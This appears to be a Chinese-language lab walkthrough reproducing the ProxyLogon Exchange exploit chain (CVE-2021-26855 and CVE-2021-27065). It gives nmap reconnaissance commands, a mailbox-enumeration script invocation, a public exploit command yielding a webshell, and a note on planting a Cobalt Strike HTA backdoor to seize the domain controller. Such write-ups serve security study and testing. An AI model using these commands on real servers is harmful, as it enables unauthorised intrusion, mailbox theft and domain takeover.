目录
漏洞概述
CVE-2021-26855与CVE-2021-27065是微软在2021年3月2日发布的高危漏洞公告。这套组合拳被称为ProxyLogon,可直接获取目标邮件服务器主机权限。
CVE-2021-26855 SSRF 漏洞 ,该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。
CVE-2021-27065 任意文件写入漏洞,该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证,利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。
利用原理:通过ssrf漏洞读取到邮箱用户的SID——>通过有效SID结合任意文件写入漏洞上传以.aspx结尾的文件,在其中插入一句话木马——>造成交互式shell。
环境搭建
exchange环境搭建:Win2012 R2 安装Exchange Server2016
建议将exchange安装在域控上。我一开始是将exchange安装在独立的服务器上,然后执行exp的时候一直显示 "[!] Failed to get OAB ID",后面装在域控上才成功复现
搭建好的环境如下
漏洞复现
要利用此漏洞我们需要知道一个邮箱号,而邮箱号一般由账号名@域名组成
1. 利用nmap探测域名
有三个可以利用的脚本
1.
nmap -T3 -sV -n -sT -Pn -v -p 80,443 --script http-ntlm-info.nse --script-args http-ntlm-info.root=/ews/ ip
2.
nmap -T3 -sV -n -sT -Pn -v -p 80,443 --script http-ntlm-info.nse --script-args http-ntlm-info.root=/oab/ ip
3.
nmap -T3 -sV -n -sT -Pn -v -p 80,443 --script http-ntlm-info.nse --script-args http-ntlm-info.root=/autodiscover/ ip
这里使用第一个脚本,我们获取了这个域的域名为test.lab
2. 利用CVE-2021-26855 SSRF获取邮箱内容
相当于枚举邮箱名字,因为我们已经获取了域名。user.txt里面为我们加入的邮箱名字典
go run CVE-2021-26855.go -h 192.168.110.152 -U user.txt
枚举出了三个邮箱
3. 命令执行
exp地址:https://github.com/herwonowr/exprolog
exprolog.py -t 192.168.89.115 -e administrator@test.lab
如下给出了命令执行的方式
将其放到burp中
4. 上线cs
生成HTA文档后门,上线cs。由于Exchange在域中具有高权限,因此,很容易就能拿到域控权限